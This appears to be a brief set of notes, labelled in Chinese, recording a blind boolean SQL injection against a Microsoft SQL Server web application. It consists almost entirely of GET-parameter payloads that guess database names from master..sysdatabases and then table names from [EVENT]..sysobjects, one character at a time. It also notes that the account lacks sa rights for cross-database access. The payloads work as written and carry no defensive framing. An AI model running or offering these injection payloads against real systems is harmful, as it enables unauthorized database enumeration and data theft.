跨库:
猜解数据库:
GET
and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <8
and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <4
and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <6
and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <7
...
...
...
and (Select top 1 ascii(substring(name,2,1)) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by
dbid
desc) <104
and (Select top 1 ascii(substring(name,3,1)) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by
dbid
desc) <104
...
...
...
and (Select top 1 len(name) from (Select top 4 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <5
master 不是sa权限,不能跨库
猜解表名:
EventCategory
GET
and (Select top 1 unicode(substring(name,2,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char(85))
T
order by id desc) < 80
and (Select top 1 unicode(substring(name,11,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char
(85)) T
order by id desc) < 80
and (Select top 1 unicode(substring(name,12,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char
(85)) T
order by id desc) < 80
and (Select top 1 unicode(substring(name,6,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char(85))
T
order by id desc) < 80
